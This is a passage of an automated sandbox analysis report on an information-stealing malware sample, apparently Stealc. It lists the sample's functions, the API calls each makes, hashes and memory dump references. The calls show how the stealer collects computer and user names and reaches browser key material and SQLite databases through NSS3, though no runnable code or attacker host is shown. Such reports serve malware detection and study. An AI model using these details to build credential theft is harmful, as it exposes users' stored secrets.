Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 123f3de61dd20dbe8e1f64a6ab078965f14896850ca6563a15ed9bab00fcfc33
Instruction ID: dc2cdbf8e8ca4d457ce43eb423554800259592d92d8c7275c5b6d76ae1a75caa
Opcode Fuzzy Hash: 123f3de61dd20dbe8e1f64a6ab078965f14896850ca6563a15ed9bab00fcfc33
Instruction Fuzzy Hash: 8A41A474A00209EFCB44CF98C494BADBBB1FB48354F24C2A9E9599B355D735AA81CF84

Function 007710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0077114E,?,?,00786A1C), ref: 007710B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0077114E,?,?,00786A1C), ref: 007710F7

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8a0d9d792a3066fe0bf1b33c7c43d662404f7c907f3ee913dc21fec337910724
Instruction ID: d9f72e4da44ca629acb33cf2d580ba55da82a7235229ef3ac0a3fdf82d8f9a15
Opcode Fuzzy Hash: 8a0d9d792a3066fe0bf1b33c7c43d662404f7c907f3ee913dc21fec337910724
Instruction Fuzzy Hash: 40F0E271681308BBEB149AA8AC89FAAB7ECE705B65F304548F504E3280D571AE00DBA1

Function 00788D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00780117,?,00000000,?,00000000,00790DAB,00790DAA), ref: 00788D9F

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4037d6d13f07e636030cd866e2303a52a620f0a284f43d1bbcaa845c877bd888
Instruction ID: 8ce7c11224a2de0c4a0447b3395f0f41e2036ecdf7e5e66caa9c0c3401bd34e1
Opcode Fuzzy Hash: 4037d6d13f07e636030cd866e2303a52a620f0a284f43d1bbcaa845c877bd888
Instruction Fuzzy Hash: B4F01570D44208FBDB04FFA4D5496DCBB74EB14320F50829AE866673C0DB386A45DB92

Function 00788DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9e1302c0367ca742c4289e85a34ec26b9ba68243580706dabd00d1f0a3091ff6
Instruction ID: b61ad13fecf9bee610f6df1ea9273c567b6a0a8b3d7fe92bb4f2d2d8e5c3e61f
Opcode Fuzzy Hash: 9e1302c0367ca742c4289e85a34ec26b9ba68243580706dabd00d1f0a3091ff6
Instruction Fuzzy Hash: D7E0123194034CBBDB91EB50DC96FAD737C9B44B11F004295BA0C5A1C0DE74AB858B91

Function 00771190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 007878E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00786A2B), ref: 00787910
Part of subcall function 007878E0: HeapAlloc.KERNEL32(00000000,?,?,?,00786A2B), ref: 00787917
Part of subcall function 007878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0078792F

Part of subcall function 00787850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007711B7), ref: 00787880
Part of subcall function 00787850: HeapAlloc.KERNEL32(00000000,?,?,?,007711B7), ref: 00787887
Part of subcall function 00787850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0078789F

ExitProcess.KERNEL32 ref: 007711C6

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 846b89fbfd484c71d425a0501a2fb5b1f2fc2d2262c16530fe712125616d81e7
Instruction ID: cbbb3a0822547a030f5ed33fb02f381eee4d493d08b531911bc5f0b10014b718
Opcode Fuzzy Hash: 846b89fbfd484c71d425a0501a2fb5b1f2fc2d2262c16530fe712125616d81e7
Instruction Fuzzy Hash: 70E0C2B1968305E3CE0437F4AD4EB2A338C5B10385F844528FA09C2142FE2DE800C767

Function 00779880 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,00780759,?,?), ref: 00779888

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: d8ab43379ebbaa15f17ce83adb48ce0e456d0bcf95acbef2b078b964938d0db2
Instruction ID: 52de6b965c3602efefe2e6e791142e08ad50e7b6c929ff31960573e20e6c274b
Opcode Fuzzy Hash: d8ab43379ebbaa15f17ce83adb48ce0e456d0bcf95acbef2b078b964938d0db2
Instruction Fuzzy Hash: 0CF0F4B5D40208FBDB00EFA4D946B9DB7B4EB05300F108595EA1997285E675AB14CB92

Non-executed Functions

Function 6C8F7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F7C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C8F7C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6C8F7D1E

Part of subcall function 6C8F7870: SECOID_FindOID_Util.NSS3(?,?,?,6C8F91C5), ref: 6C8F788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8F7D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C8F7D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C8F7DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8F7DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F7DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8F7E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6C8F7E58

Part of subcall function 6C8F7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8F91C5), ref: 6C8F78BB
Part of subcall function 6C8F7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C8F91C5), ref: 6C8F78FA
Part of subcall function 6C8F7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C8F91C5), ref: 6C8F7930
Part of subcall function 6C8F7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8F91C5), ref: 6C8F7951
Part of subcall function 6C8F7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8F7964
Part of subcall function 6C8F7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C8F797A
Part of subcall function 6C8F7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C8F7988
Part of subcall function 6C8F7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C8F7998
Part of subcall function 6C8F7870: free.MOZGLUE(00000000), ref: 6C8F79A7
Part of subcall function 6C8F7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C8F91C5), ref: 6C8F79BB
Part of subcall function 6C8F7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C8F91C5), ref: 6C8F79CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8F7E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8F7F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8F7F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C8F7FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8F7FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C8F8038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C8F8050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C8F8093
SECOID_FindOID_Util.NSS3 ref: 6C8F7F29

Part of subcall function 6C8F07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C898298,?,?,?,6C88FCE5,?), ref: 6C8F07BF
Part of subcall function 6C8F07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8F07E6
Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F081B
Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F0825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C8F8072
SECOID_FindOID_Util.NSS3 ref: 6C8F80F5

Part of subcall function 6C8FBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C8F800A,00000000,?,00000000,?), ref: 6C8FBC3F

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: b38342aecbff23e6e4bc73cc0da4c9ed745802330375478349bc6906b9ec359b
Instruction ID: 2f5f32d2816767cc7223092c01153804d44c415ca693b70bc06983ed20107364
Opcode Fuzzy Hash: b38342aecbff23e6e4bc73cc0da4c9ed745802330375478349bc6906b9ec359b
Instruction Fuzzy Hash: 75E1A1716043009FE720CF29DA80B5A77E5EF89788F550D2DE8A99BB51E731EC06CB52

Function 6C881C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6C881C6B
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C881C75
GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C881CA1
GetLengthSid.ADVAPI32(?), ref: 6C881CA9
malloc.MOZGLUE(00000000), ref: 6C881CB4
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C881CCC
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C881CE4
GetLengthSid.ADVAPI32(?), ref: 6C881CEC
malloc.MOZGLUE(00000000), ref: 6C881CFD
CopySid.ADVAPI32(00000000,00000000,?), ref: 6C881D0F
CloseHandle.KERNEL32(?), ref: 6C881D17
AllocateAndInitializeSid.ADVAPI32 ref: 6C881D4D
GetLastError.KERNEL32 ref: 6C881D73
PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C881D7F

Strings

_PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C881D7A

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
API String ID: 3748115541-1216436346
Opcode ID: b446396f6c06193dbb1d4cde2a368725b2b6c01baf84cce24f6f902c7ca66b6c
Instruction ID: a16d34d89e8db15b9b4e425c7c32aa61112b91f7102fc6b517d74481734f53b5
Opcode Fuzzy Hash: b446396f6c06193dbb1d4cde2a368725b2b6c01baf84cce24f6f902c7ca66b6c
Instruction Fuzzy Hash: 9B31A4B1A04218AFEF50EF64DC48BAA7FB8FF5E305F104069FA4992110EB309994CF65

Function 6C883D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C883DFB
__allrem.LIBCMT ref: 6C883EEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C883FA3
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C884047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8840DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C88415F
__allrem.LIBCMT ref: 6C88416B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C884288
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8842AB
__allrem.LIBCMT ref: 6C8842B7

Strings

%lld, xrefs: 6C883FB2
%03d, xrefs: 6C8842E8
%04d, xrefs: 6C88407B
%02d, xrefs: 6C884086

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
String ID: %02d$%03d$%04d$%lld
API String ID: 703928654-3678606288
Opcode ID: 4d079af2f981af927f1d2ccbfbd24c68f3ac257ce0e5c6942e4e21accba685b9
Instruction ID: ad1ae1dd37bd6f814c90904e6e05536e659129060b969a222d2086118e79a153
Opcode Fuzzy Hash: 4d079af2f981af927f1d2ccbfbd24c68f3ac257ce0e5c6942e4e21accba685b9
Instruction Fuzzy Hash: 66F13072A087409FD725CF38C990A6BB7FAAFD5308F148E2DF48597A51E730D8458B82

Function 6C831C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C831D58
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C831EFD
sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C831FB7

Strings

sqlite_master, xrefs: 6C831C61
table, xrefs: 6C831C8B
attached databases must use the same text encoding as main database, xrefs: 6C8320CA
abort due to ROLLBACK, xrefs: 6C832223
unknown error, xrefs: 6C832291
unsupported file format, xrefs: 6C832188
sqlite_temp_master, xrefs: 6C831C5C
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C831F83
no more rows available, xrefs: 6C832264
another row available, xrefs: 6C832287

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

